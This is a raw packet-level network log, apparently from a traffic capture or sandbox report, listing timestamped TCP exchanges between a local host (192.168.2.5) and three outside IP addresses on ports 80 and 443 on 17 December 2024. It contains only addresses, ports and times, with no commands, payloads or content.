Dec 17, 2024 06:03:12.878668070 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.878729105 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.878787041 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.878844023 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.879898071 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.879956961 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.879985094 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.880042076 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.881000042 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.881055117 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.881143093 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.881198883 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.882252932 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.882306099 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.882370949 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.882424116 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.883407116 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.883460999 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.883518934 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.883579016 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.884589911 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.884645939 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.884705067 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.884761095 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.885778904 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.885838032 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.885968924 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.886027098 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.887125015 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.887136936 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.887190104 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.888237953 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.888251066 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.888309956 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.889390945 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.889450073 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.889492035 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.889550924 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.890563965 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.890623093 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.890640974 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.890698910 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.891819954 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.891832113 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.891874075 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.892927885 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.892982960 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.893027067 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.893080950 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.894134045 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.894191027 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.894197941 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.894248009 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.895360947 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.895415068 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.895724058 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.895775080 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.896444082 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.896501064 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.896965981 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.897013903 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.897713900 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.897725105 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.897767067 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.898967028 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.899018049 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.899092913 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.899143934 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.900048018 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.900095940 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.900171041 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.900219917 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.901258945 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.901309013 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.901374102 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.901423931 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.902450085 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.902506113 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.902556896 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.902615070 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.903598070 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.903650045 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.903803110 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.903852940 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.904817104 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.904869080 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:12.904870033 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:12.904913902 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:15.153605938 CET	49827	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:15.154144049 CET	49846	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:15.273741961 CET	80	49827	185.215.113.43	192.168.2.5
Dec 17, 2024 06:03:15.273839951 CET	80	49846	185.215.113.43	192.168.2.5
Dec 17, 2024 06:03:15.273902893 CET	49827	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:15.273955107 CET	49846	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:15.274230957 CET	49846	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:15.394052029 CET	80	49846	185.215.113.43	192.168.2.5
Dec 17, 2024 06:03:16.028748989 CET	49849	443	192.168.2.5	104.131.68.180
Dec 17, 2024 06:03:16.028815985 CET	443	49849	104.131.68.180	192.168.2.5
Dec 17, 2024 06:03:16.028974056 CET	49849	443	192.168.2.5	104.131.68.180
Dec 17, 2024 06:03:16.031136990 CET	49849	443	192.168.2.5	104.131.68.180
Dec 17, 2024 06:03:16.031160116 CET	443	49849	104.131.68.180	192.168.2.5
Dec 17, 2024 06:03:16.607348919 CET	80	49846	185.215.113.43	192.168.2.5
Dec 17, 2024 06:03:16.607530117 CET	49846	80	192.168.2.5	185.215.113.43
Dec 17, 2024 06:03:16.693101883 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:16.705926895 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:16.815401077 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:16.815476894 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:16.825624943 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:16.825695992 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:16.826128960 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:16.945756912 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:17.262542009 CET	443	49849	104.131.68.180	192.168.2.5
Dec 17, 2024 06:03:17.262646914 CET	49849	443	192.168.2.5	104.131.68.180
Dec 17, 2024 06:03:17.264930010 CET	49849	443	192.168.2.5	104.131.68.180
Dec 17, 2024 06:03:17.264955997 CET	443	49849	104.131.68.180	192.168.2.5
Dec 17, 2024 06:03:17.265363932 CET	443	49849	104.131.68.180	192.168.2.5
Dec 17, 2024 06:03:17.308841944 CET	49849	443	192.168.2.5	104.131.68.180
Dec 17, 2024 06:03:17.338397980 CET	49849	443	192.168.2.5	104.131.68.180
Dec 17, 2024 06:03:17.338440895 CET	49849	443	192.168.2.5	104.131.68.180
Dec 17, 2024 06:03:17.338644028 CET	443	49849	104.131.68.180	192.168.2.5
Dec 17, 2024 06:03:17.687387943 CET	443	49849	104.131.68.180	192.168.2.5
Dec 17, 2024 06:03:17.687493086 CET	443	49849	104.131.68.180	192.168.2.5
Dec 17, 2024 06:03:17.687711000 CET	49849	443	192.168.2.5	104.131.68.180
Dec 17, 2024 06:03:17.688745022 CET	49849	443	192.168.2.5	104.131.68.180
Dec 17, 2024 06:03:17.688796043 CET	443	49849	104.131.68.180	192.168.2.5
Dec 17, 2024 06:03:17.688829899 CET	49849	443	192.168.2.5	104.131.68.180
Dec 17, 2024 06:03:17.688846111 CET	443	49849	104.131.68.180	192.168.2.5
Dec 17, 2024 06:03:18.160152912 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.160166979 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.160217047 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.160269976 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.160352945 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.160365105 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.160376072 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.160376072 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.160496950 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.160507917 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.160518885 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.160527945 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.160543919 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.160624027 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.291758060 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.291861057 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.291882038 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.291980028 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.296700954 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.296713114 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.296802998 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.352405071 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.352437973 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.352543116 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.356714964 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.356769085 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.358143091 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.358186960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.358212948 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.358266115 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.366517067 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.366602898 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.366628885 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.366687059 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.374892950 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.375047922 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.375119925 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.383554935 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.383567095 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.383631945 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.391752958 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.391763926 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.391836882 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.400126934 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.400178909 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.400245905 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.400473118 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.412031889 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.412045002 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.412096977 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.416887999 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.416941881 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.416986942 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.417031050 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.425309896 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.425421953 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.425436020 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.425498009 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.433697939 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.433710098 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.433876991 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.472498894 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.472604990 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.472723961 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.472770929 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.544261932 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.544317961 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.544462919 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.544507980 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.546345949 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.546391964 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.546395063 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.546437025 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.550486088 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.550532103 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.552017927 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.552078962 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.552227974 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.552272081 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.556150913 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.556210995 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.556323051 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.556370020 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.560422897 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.560472012 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.560502052 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.560539007 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.564505100 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.564579010 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.564601898 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.564640999 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.568677902 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.568784952 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.568805933 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.568833113 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.572951078 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.572962046 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.572999001 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.577188015 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.577198982 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.577270031 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.581185102 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.581235886 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.581383944 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.581432104 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.585335970 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.585427999 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.585462093 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.585505009 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.589576006 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.589620113 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.589744091 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.589785099 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.593601942 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.593645096 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.593777895 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.593821049 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.598012924 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.598022938 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.598059893 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.602052927 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.602098942 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.602121115 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.602130890 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.605704069 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.605763912 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.605789900 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.605834961 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.609318018 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.609375000 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.609473944 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.609519005 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.613001108 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.613044977 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.613120079 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.613173008 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.616626978 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.616692066 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.616755009 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.616800070 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.620393038 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.620441914 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.620445967 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.620490074 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.623981953 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.624032021 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.624063015 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.624114037 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.627621889 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.627676964 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.627902031 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.627943993 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.631350994 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.631401062 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.631592989 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.631633997 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.634874105 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.634917974 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.736656904 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.736752033 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.736779928 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.736819983 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.737926960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.737973928 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.738040924 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.738085032 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.740777016 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.740789890 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.740823984 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.743277073 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.743288040 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.743329048 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.743352890 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.745695114 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.745824099 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.745922089 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.745934010 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.748214960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.748284101 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.748315096 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.748353958 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.750762939 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.750814915 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.750972986 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.751017094 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.753240108 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.753288984 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.753314972 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.753356934 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.755651951 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.755702972 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.755724907 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.755769968 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.758085012 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.758147001 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.758184910 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.758229017 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.760433912 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.760499001 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.760571003 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.760613918 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.762815952 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.762876987 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.762926102 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.762974024 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.765158892 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.765223026 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.765295982 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.765342951 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.767631054 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.767643929 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:18.767689943 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:18.770109892 CET	80	49850	31.41.244.11	192.168.2.5
